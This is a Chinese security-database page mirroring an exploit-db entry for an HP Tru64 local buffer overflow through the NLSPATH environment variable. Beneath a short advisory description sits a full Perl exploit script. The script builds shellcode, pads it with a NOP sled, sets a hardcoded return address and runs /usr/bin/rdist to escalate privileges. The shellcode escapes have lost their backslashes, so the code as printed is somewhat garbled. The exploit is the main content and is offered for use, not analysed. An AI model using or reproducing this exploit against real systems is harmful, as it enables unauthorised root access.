HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)

HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)

漏洞ID 1053613 漏洞类型
发布时间 2002-08-30 更新时间 2002-08-30
图片[1]-HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)-安全小百科CVE编号 N/A
图片[2]-HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)-安全小百科CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21773
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5647/info
 
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
 
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges. 

#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com

$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";

print "Shellcode is " . length($sc) . " bytes long n";

$tlen = (1024-(length($sc)))/4;

$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain) 
$ret = "x9ax01x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
exec("/usr/bin/rdist -c DMr0x");

相关推荐: xtell User Status Remote Information Disclosure Vulnerability

xtell User Status Remote Information Disclosure Vulnerability 漏洞ID 1102398 漏洞类型 Design Error 发布时间 2002-02-27 更新时间 2002-02-27 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享